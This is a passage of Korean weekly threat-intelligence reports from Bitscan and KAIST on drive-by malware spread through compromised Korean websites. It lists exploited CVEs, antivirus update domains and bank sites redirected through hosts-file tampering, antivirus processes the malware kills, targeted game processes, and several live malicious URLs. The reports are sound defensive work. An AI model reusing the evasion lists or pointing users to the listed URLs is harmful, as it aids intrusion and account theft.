    • 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다. 또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하세요. 또한 금주 전문분석에는 악성코드의 시스템 다운로드 이후의 악의적인 행위들에 대해서 분석된 내용이 전달 됩니다.

    • 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.
    • 6월 2주차 보고서에 언급 되었던 백신 업데이트 방해를 위한 Host 파일 변조 코드가 유포 되었으며, 본 내용의 경우 신규 제로데이를 이용한 악성코드를 탐지하고 대응 하려는 백신의 역할에 대해 제한을 두고, 목적을 달성 하기 위한 것으로 판단 됩니다.


    백신 업데이트 방해를 위한 Host 파일 변조 내용


    백신 업데이트 서버

    변경 IP

    vaccine.dn.naver.com

    49.111.xxx.36

    explicitupdate2.alyac.co.kr

    125.234.xxx.36

    liveupdate2.alyac.co.kr

    105.105.xxx.37

    explicitupdate.alyac.co.kr

    85.109.xxx.37

    ko-kr.alupdatealyac.altools.com

    241.88.xxx.37

    su.ahnlab.com

    45.135.xxx.37

    gms.ahnlab.com

    21.110.xxx.37

    update.ahnlab.com

    33.55.xxx.37



    Diablo III에 대한 공격이 추가된 게임 계정 모니터링 및 백신 프로세스 Kill 항목

    프로세스명

    프로그램명

    백 신

    sgbider.exe, vcsvc.exe

    vcsvcc.exe

    바이러스체이서

    NVCAgent.npc, nsvmon.npc

    Nsavsvc.npc, NaverAgent.exe

    네이버백신

    V3LRun.exe, MUpdate2.exe

    SgSvc.exe

    V3Light.exe, V3LTray.exe

    V3LSvc.exe

    V3

    AYUpdSrv.aye,

    AYRTSrv.aye, SkyMon.exe

    AYServiceNT.aye

    AYupdate.aye, AyAgent.aye

    알약

    PCOTP.exe

    넥슨 OTP

    게 임

    gamehi.co.kr

    게임하이

    hangame.com

    한게임

    netmarble.net

    넷마블

    Raycity.exe

    레이시티

    ff2client.exe

    피파 온라인2

    pmang.com

    피망

    df.nexon.com, dnf.exe

    던전 앤 파이터

    DragonNest.exe

    드래곤 네스트

    WinBaram.exe

    바람의 나라

    heroes.exe

    마비노기 영웅전

    wow.exe

    월드 오브 워크래프트

    lin.bin

    리니지

    MapleStory.exe

    메이플 스토리

    Diablo III.exe

    디아블로III



    본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다.

    현재 패치가 없는 상태에서의 대응책은 “웹 서핑 금지” 라고 해야 될 것인지 심각한 상황입니다.



    금주 공격에 사용된 취약성 비율


    상세 분석 진행에 따라 취약성 판정 비율이 일정 부분 달라지고 있습니다만 큰 흐름은 차이가 없습니다.. 공격이 많이 복잡한 형태를 띄고 있어서 정확한 CVE 판정이 어려운 상황도 발생 되고 있는 상황입니다.



    - CVE 2011-3544 ( 25.4%) Java Applet 취약성

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

    - CVE 2012-0507 ( 25.4%) Java Applet 취약성 - Java Web start 취약성

    http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

    - CVE 2012-1889( 22.2%) MS XML Core Service 취약성

    http://technet.microsoft.com/ko-kr/security/advisory/2719615

    - CVE 2012-0003 (13.5%) Windows Midi 취약성 –

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

    - CVE 2012-0754 (13.5%) Flash 취약성 –

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

    - CVE 2010-0249 (1%) IE 취약성 –

    - http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx

    - CVE 2010-0806 (0%) IE 취약성 ( IE 6,7 대상)

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

    - CVE 2011-2140 (0%) Adobe Flash 취약성

    http://www.adobe.com/support/security/bulletins/apsb11-21.html

    취약성 비율을 살펴 보시면 아시겠지만 MS 제로데이 취약성에 대한 공격은 전주 대비 급증한 비율을 볼 수 있습니다. 전주의 공격 시에 효과가 좋았던 것으로 판단되며 금주 차 공격에 대거 활용한 형태를 볼 수 있습니다. 더불어 효율이 낮은 공격들은 제외된 것으로 판단 됩니다. 공격자들은 효과적으로 공격을 시행 하고 있으며, 공격 기법의 변화로 살펴 볼 때 MS 관련된 제로데이 공격이 매우 효과가 좋았던 것으로 추정이 되고 있어서 심각도가 높은 수준으로 상향 되어야 할 것 같습니다. 또한 MS의 XML 서비스 공격이 대규모로 확산 되고, 사용자 PC에 영향을 직접적으로 미치고 있다는 것을 인지 하지 못하고 있는 상태라 대응도 느린 것 같아 당분간 패치 발표 이전까지는 빛스캔에서 상당 수준의 정보를 오픈 하여 대응 및 후속 대책 마련을 촉구하도록 하겠습니다.



    금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각 기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



    차단 권고 대역


    * 기술 분석 보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 적극 활용 바랍니다.

     

    공개지면 생략


    * 악성코드 감염 이후 접속 URL - 차단 및 모니터링 필요한 부분

    - 이 부분에 대해서 설명을 제대로 드리지 않았는데 본 내용은 악성코드가 PC에 감염된 이후에 외부로 연결 시도를 하고 명령을 받는 주소들입니다. 즉 C&C 연결을 시도하는 봇넷과 같은 개념으로 볼 수 있습니다. C&C 서버의 차단과 관련된 핵심적인 내용이 되겠습니다. 본 내용의 경우에도 외부에는 제공 되지 않습니다. 차후 별도 서비스로 운영이 될 수 있습니다.


     공개지면 생략



    현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 또한 어떤 방식으로든 빛스캔의 악성링크 탐지와 분석 내용에 대해서 인지를 일부 하고 있는 것으로 판단 됩니다. 또한 금주의 총평으로는 제로데이의 적극적인 활용입니다. 기존의 규모를 확장 하는 형태에서 제로데이 활용을 증가 시키는 형태로 전환 된 것이 가장 큰 특징이며, 제로데이 공격이 증가한 가장 큰 이유는 공격에 대한 효과가 충분히 검증 되었다는 반증이라 할 것입니다.


    *시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다. KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.


    * 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 본 서비스의 권리는 빛스캔에 있으므로 공개적 활용 및 영리적 목적으로 활용 하실 수 없습니다.


    * 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

    Posted by 바다란


    빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 6월 2주차 국내 인터넷 환경의 위협 분석 내용이며 본 보고서는 빛스캔의 PCDS ( Pre Crime Detect System) 와 KAIST 보안센터의 분석 역량이 결집된 분석 보고서 입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응을 하도록 방향 제시를 하고 있습니다.



    본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다. 모든 IP 주소와 도메인 명은 가려지며 보고서 서비스의 구독을 하시는 기업 / 기관에는 공개적으로 기술이 됩니다.


    본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

    1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

    2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

    3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 기술 분석 문서 참고)


    *금주 차 보고서 형태가 변경 되었습니다. 동향 분석은 그대로 이고 기술 분석이 각 사용 되는 취약성 부류에 따라 별개 문서로 작성 되었으나 하나의 문서에 유형별로 정리가 되어 있습니다. 중복된 해결 방안이 다수 제거한 형태로 변경 되었으니 참고 하세요. 또한 기술분석 보고서에는 최종 악성코드 다운로드 경로까지 기술 되어 있습니다.



    금주 차의 특징은 신규 악성링크는 전주 대비 100% 이상 증가 하였으며 5월 보고서부터 언급하였던 Malware Net의 활동이 본격적으로 개시 되었습니다.

    악성링크에 대해 대규모 변경과 추가가 계속 발생 되고 있습니다. 신규 악성링크의 수치는 전주 대비 대폭 증가 하였으며, 해당 악성링크들이 Malware net을 통해 대규모로 전파 되었고 수시로 변경 되는 형태를 나타내고 있습니다. 지난주에 250여곳 이상에서 관찰된 Malware net은 금주 활동이 축소 되었고 신규 Malware-net이 가동 되었습니다.


    규모 면에서는 매주 마다 최대규모를 갱신하고 있는 상황이며, 중간 경로를 이용한 효율적 공격들이 대규모로 관찰 되고 있어서 영향력과 위험성은 계속 증가 하고 있습니다.



    큰 특징은 다음과 같습니다.



    • 거대 Malware net의 확장과 변화 ( 최대규모 350여개 이상의 사이트에서 운영) -6월 1주차 250여개의 웹서비스에서 악성코드 중계로 사용 되었던 링크( www.xxx.or.kr/popup_img/popup.js ) 는 현재 140여 곳으로 줄었으며 주말을 기해 악성링크가 추가 되고 삭제 되기를 반복 하였습니다. 5월 5주차 보고서에서 언급 하였던 Malware Net ( http://www.xxxxxxx.com/script/js/script.js) 은 공개 이후 대폭 줄어 들었으나 또 다른 중계 링크로 대거 전환이 되었습니다. 6월 2주차에 전환된 Malware net은 ( www.xxxxxxx.com/school02/flash/view.js ) 이며 213여 곳 이상의 웹 서비스에 추가 되어 중계 되었습니다. 두 곳의 Malware net을 통해 350여 곳 이상의 웹 서비스에서 악성링크를 중계한 사례가 발생 되었습니다.

    * 현재 발견 된 것 중에서도 대규모 Malware net 이외에 다수의 Malware net이 운영 중입니다. 단 1~2일 만에 수 백여 개의 웹 서비스에 추가될 정도로 정교하고 대량 변조가 가능한 공격 도구를 확보한 것으로 추정 됩니다.

    * 전략적인 측면에서 탐지 회피를 위한 다수의 기법들이 사용 되었고 이 중에는 다수의 중간 경유지를 활용하여 최종 악성링크 판별이 어렵도록 하는 시도가 금주 차에 대거 발견 되었습니다.


    • 몇몇 은행의 인터넷 뱅킹을 특정 사이트로 유도하기 위한 공격의 온라인 전파 ( Drive by download 파일 업데이트가 아닌 웹 서비스 방문을 통한 대규모 유포 시도)

    • 분석 방해를 위한 Virtual machine 회피 기법 활용 국내 주요 백신에 Killing, 거의 대부분의 게임에 대한 프로세스 모니터링 대규모 발견 ( 디아블로 3 계정 탈취형 악성코드 대량 유포 발견)

    • 백신 업데이트 방해를 위한 다양한 백신 업데이트 주소에 대한 Host 파일 변조 발견 , 루트킷에 의한 삭제 및 악성 프로세스 보호 기능 추가된 악성코드 유포

    * 악성코드 자체에서 분석방해를 위한 VM (가상머신) 과 디버거를 탐지 하여 실행 흐름의 변경 및 실행 시 난독화를 적용하여 판단 및 분석을 어렵게 하는 기능이 다수 발견 됨

    • 백도어 키로거 기능의 악성코드 유포 증가 - 6.18일 부터 Mass sql 공격의 일종으로 추가된 nmmkmm.com/r.php 링크가 신규 발견 되어 확산 중입니다.


    • 산호세에 위치한 호스팅 업체에 배정된 IP 대역을 대규모로 악성링크로 활용 하였습니다. 호스팅 업체는 EGI Hosting 입니다.


    * IE 관련된 zero day 공격 코드가 공개 되어 활용 되고 있습니다. 향후 대규모 공격에 사용 될 수 있으므로 주의를 기울여야 합니다. 대규모 유포 발생 시 즉시 반영 되어 알려 드리도록 하겠으며, 현재 까지 대규모 유포로 출현 하지는 않았습니다.

    CVE 2012-1889 : MSXML Memory Corruption, CVE 2012-1875 IE Same ID Use After Free





    금주 월요일 기준 통계에 의하면 발견된 악성링크 흔적은 2600여 곳 이상이며 Malware Net은 거대 Malware net 두 곳이 현재도 활동 중에 있습니다. 또한 근본 취약성 및 백도어를 제거 하지 못한 상태에서 악성링크로 사용 되는 js 파일만을 삭제하는 것은 대책이 될 수 없으며, 언제든 공격자가 원하는 시점에 계속 해서 악성코드 유포에 이용 할 수 있는 상황임을 알고 본 보고서를 받으시는 기업/ 기관에서는 반드시 차단 정책을 적용 하시기 바랍니다.


    금주의 악성코드 유포지로 직접 이용된 웹서비스들은 380여 개 이상이며 전주 대비 증가 되었으며, 악성코드가 실제로 내려오는 악성링크의 수치가 전주 대비 100% 이상 증가한 상태를 나타내고 있는 것은 그만큼 공격자들의 공격과 변화가 활발했음을 의미합니다. 5월 보고서에서 최초 언급 되었던 Malware net들은 그 활용도가 이제 적정 기준점을 넘은 활발한 활동을 보이고 있으며 빠른 시간 내에 변경 되는 것으로 관찰 되고 있어서 향후의 위험성에 대해서 강도 높은 우려를 표명합니다. 현재 상태는 공격자가 매우 높은 수준의 자유도를 가지고 자유롭게 활동 하고 있는 단계에 까지 올라선 상황입니다.


    5월 5주차 보고서에 언급된 Malware net ( http://www.xxxxxxx.com/script/js/script.js) 의 40% 가량이 6월 1주차 Malware net ( www.xxx.or.kr/popup_img/popup.js ) 250여 곳으로 확산 되었으며 6월 2주차에서는 6월 1주차의 Malware net ( www.xxxx.or.kr/popup_img/popup.js ) 은 140여 곳으로 축소 되어 활용 되었으며 추가 Malware net 인 ( www.xxxxxx.com/school02/flash/view.js ) 213 여곳 이상에서 활동이 관찰 되었습니다.

    Malware net의 범위는 계속 확장 되고 빠른 변화를 보이고 있어서 향후 Malware net에 대한 변화와 영향력 추적에 계속 집중 할 예정입니다.

    ( 현재 Malware net 으로 사용된 링크들은 수시로 활성화가 되고 있습니다. 클릭 시 주의 바랍니다. 5월 5주차 언급된 링크는 현재 시간에도 살아 있는 상태를 유지 하고 있습니다. )



    악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고, 악성코드 유포 인지도 못하는 상태는 계속 되고 있습니다. 또한 대응이라고 해봐야 근본 원인 제거 없이 악성링크가 추가된 부분만을 제거하는 것이 대응의 전부이다 보니, 공격대상에 포함된 모든 서비스들이 재활용 되는 악순환이 계속 되고 있습니다. 이제 공격자들은 자유로운 재활용을 넘어, 악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환된 상태를 계속 유지하고 있습니다.


    전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며 금융권에 대한 정보유출을 위한 악성코드도 대규모 활동을 함으로써 강도 높은 경계 단계로 진입 되었습니다. 백신의 업데이트 방해 및 자기 보호를 위한 기능 강화 및 유명 게임에 대한 계정 탈취형 코드가 웹을 통해 대규모 유포가 발생한 상황입니다.



    6 2주차 특징은 다음과 같습니다. ( 모든 IP와 URL 정보는 공식 보고서에만 공개 됩니다. )



    특징


    · · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속 ( 최대 6종류의 취약성을 동시에 이용한 공격 코드 출현)


    · · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 예상


    · · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대와 재활용 증가 ( 악성링크 자체의 탐지 회피를 위한 다양한 기법 동원)


    · · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술, 루트킷(APT 형태) 유포 계속


    · · 3월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속 및 주요 게임 및 백신 모니터링 및 업데이트 방해를 위한 Host 파일 변조 발견



    백신 업데이트 서버

    변경 IP

    vaccine.dn.naver.com

    49.111.xxx.36

    explicitupdate2.alyac.co.kr

    125.234.xxx.36

    liveupdate2.alyac.co.kr

    105.105.xx.37

    explicitupdate.alyac.co.kr

    85.109.xx.37

    ko-kr.alupdatealyac.altools.com

    241.88.xx.37

    su.ahnlab.com

    45.135.xx.37

    gms.ahnlab.com

    21.110.xxx.37

    update.ahnlab.com

    33.55.xxx.37


    · 은행 사용자를 겨냥한 Host 파일 변조 기능의 악성코드 유포


    금융권 대상의 피싱 사이트 연결 대상

    사이트명

    은행명

    은 행

    www.kbstar.com

    국민은행

    kbstar.com

    obank.kbstar.com

    banking.nonghyup.com

    농협

    www.wooribank.com

    우리은행

    wooribank.com

    pib.wooribank.com

    bank.keb.co.kr

    외환은행

    www.keb.co.kr



    * 악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


    * 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.




    사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다. 또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다. 패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고, 발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다.


    · Oracle Java 취약성, Adobe Flash 취약성 , MS Midi IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.


    · 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.


    · 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



    모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 프로세스 이외에 거의 모든 국내의 게임들에 대해서 모니터링을 하고 있습니다. 게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있으며, 그 동안 산발적으로 발견 되었던 디아블로 3 관련된 게임 계정 탈취형 악성코드 기능이 웹을 통해 대규모 유포 되었습니다. 금주 차부터 해킹 신고 및 사고 신고가 급증 할 것으로 예상 됩니다.


    ·

    프로세스명

    프로그램명

    백 신

    sgbider.exe, vcsvc.exe

    vcsvcc.exe

    바이러스체이서

    NVCAgent.npc, nsvmon.npc

    Nsavsvc.npc, NaverAgent.exe

    네이버백신

    V3LRun.exe, MUpdate2.exe

    SgSvc.exe

    V3Light.exe, V3LTray.exe

    V3LSvc.exe

    V3

    AYUpdSrv.aye,

    AYRTSrv.aye, SkyMon.exe

    AYServiceNT.aye

    AYupdate.aye, AyAgent.aye

    알약

    PCOTP.exe

    넥슨 OTP

    게 임

    gamehi.co.kr

    게임하이

    hangame.com

    한게임

    netmarble.net

    넷마블

    Raycity.exe

    레이시티

    ff2client.exe

    피파 온라인2

    pmang.com

    피망

    df.nexon.com, dnf.exe

    던전 앤 파이터

    DragonNest.exe

    드래곤 네스트

    WinBaram.exe

    바람의 나라

    heroes.exe

    마비노기 영웅전

    wow.exe

    월드 오브 워크래프트

    lin.bin

    리니지

    MapleStory.exe

    메이플 스토리

    Diablo III.exe

    디아블로III






    본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다.

    APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다. 대응에 참고 하십시요.



    사용된 취약성 비율



    - CVE 2011-3544 ( 25.5%) Java Applet 취약성

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

    - CVE 2012-0507 ( 36%) Java Applet 취약성 - Java Web start 취약성

    - CVE 2012-0003 (20.2%) Windows Midi 취약성

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

    - CVE 2012-0754 (24.2%) Flash 취약성

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

    - CVE 2010-0806 (2.2%) IE 취약성 ( IE 6,7 대상)

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806


    -CVE 2011-2140 (0.4%) Adobe Flash 취약성



    금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



    4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다. 또한 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해강력한 차단을 유지하실 것을 권고 합니다.


    차단 권고 대역



    * 각 개별 분석보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 적극 활용 바랍니다.

    -  공식 보고서 및 메일에만 기술 되어 있으며, 공개 게시물에는 삭제됨


    현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 또한 어떤 방식으로든 빛스캔의 악성링크 탐지와 분석 내용에 대해서 인지를 일부 하고 있는 것으로 보여 전략적인 움직임이 매우 많은 한 주로 총평을 할 수 있으며 향후 외부 공개 수준에 대해서 심각하게 고민을 해야 할 것 같습니다.



    주말에만 집중 되던 공격이 금주 에는 주중에도 이미 발생 되어 활발하게 활동이 일어나고 있습니다. 인터넷 서핑 주의를 당부 드려야 할 것 같습니다. Cookie 값 ralrlea를 주의 하세요. 물론 다른 쿠키 값들도 많지만 가장 많은 쿠키로 사용되는 값입니다. 


    공익적인 목적으로 기관에 제공 되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

    감사합니다.


    *시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다. KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.



    * 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.


    * 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

    Posted by 바다란

    빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 6 1주차 국내 인터넷 환경의 위협 분석 내용입니다. 

    본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다.

    모든 IP 주소와 도메인 명은 가려지며 보고서 서비스의 구독을 하시는 기업 / 기관에는 공개적으로 기술이 됩니다.


     본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

     


    1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

    2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

    3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


     


    금주 차의 특징은 공격자들의 전략적인 공격이 대폭 확대 되고 있습니다악성링크에 대해 대규모 변경과 추가가 계속 발생 되고 있습니다신규 악성링크의 수치는 전주와 유사하며 신규 악성코드만 일부 증가된 형태를 보이고 있습니다그러나 실제 악성링크 하나가 전주에 관찰 되었듯이 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였으며 금주에는 최대 250개 이상의 사이트에서 동일 링크가 중계되는 관찰이래 최대치의 악성링크 확산 사태가 발생 하였습니다. 즉 중간 경로를 이용한 효율적 공격들이 대규모로 관찰 되고 있어서 영향력 면에서는 지난주의 100여개 이상의 사이트에서 유포된 사례와 비교하여 위험성은 더 대규모로 확대된 상태 입니다.



     큰 특징은 다음과 같습니다.



             * 현재 발견 된 것 중에서도 대규모 Malware net 이외에 다수의 Malware net이 운영 중에 있습니다. 규모는 작으나 언제든 대규모 확장이 가능한 상태로 유지됨

    • 몇몇 은행의 인터넷 뱅킹을 특정 사이트로 유도하기 위한 공격의 온라인 전파 ( Drive by download  파일 업데이트가 아닌 웹 서비스 방문을 통한 대규모 유포 시도)

    http://www.dailysecu.com/news_view.php?article_id=2363 에서 기사화된 내용과 동일한 내용이나 특정 방송의 업데이트나 일부에 국한된 문제가 아니며 대규모 Malware net을 통해 방문자들 모두에게 대량 유포되는 형태로 유포 되었으며 국내에 매우 많이 확산 되어 있을 것으로 판단 됩니다. )


    • 분석 방해를 위한 Virtual machine 회피 기법 활용  국내 주요 백신에  Killing, 거의 대부분의 게임에 대한 프로세스 모니터링 대규모 발견


    • 백도어  키로거 기능의 악성코드 유포 대폭 증가 - 6.10일 부터 Mass sql 공격의 일종으로 추가된  fjuhgk.com/r.php 링크가 신규 발견 되어 확산 중입니다.


    부수적으로 중앙일보에 대한 페이지 변조 사건이 있었습니다만 저희쪽에 감지된 일부 언론사의 경우 실제 악성코드 유포에 직접 활용 되었으며  언론사는 조선일보 입니.  저희쪽에 감지된 악성링크가 추가된 url 은 xxxxxxx.chosun.com/inc/scripts.js 이나 전체적으로 문제가 있었을 것으로 예상 되고 있습니다.  

    방문시 실행 되는 악성링크는 50.117.xxx.86/image/img.js 입니다. 시스템 상에 백도어 설치를 통해 게임 계정 정보를 유출 하는 악성코드의 일종이 설치 되었습니다. 1주일 동안 발견된 악성코드 흔적 2300여 곳중 하나일 뿐입니다.  중앙일보 페이지 변조 보다 수준 높은 악성코드 유포가 그만큼 많이 일어나고 있는 현재의 모습일 뿐입니다.



     


    금주의 악성코드 유포지로 이용된 웹서비스들은 300여곳 이상이며 전주 대비 대폭 감소 되었으나 실제로는 600여곳 이상에서 악성코드를 중계 하였습니다.  전주 대비 감소의 이유에는 250여 곳 이상의 서비스에서 악성코드를 유포한 악성링크가 이미 지난 3월에 발견된 악성링크로서 금주의 신규 악성링크 통계에는 빠져 있어서 통계치의 왜곡이 발생 되었습니다3월에 소규모였던 악성링크 확산 규모가 주말 단 2일 동안에 250여 개 이상의 웹 사이트에서 중계를 하도록 확장 되는 심각한 국면이 전개 되고 있습니다. 6 1주차의 전체 악성링크 흔적이 발견된 곳은 2300여 곳입니다.

     


    현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 250개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 확산 되고 있습니다. 악성링크가 삽입된 웹서비스들

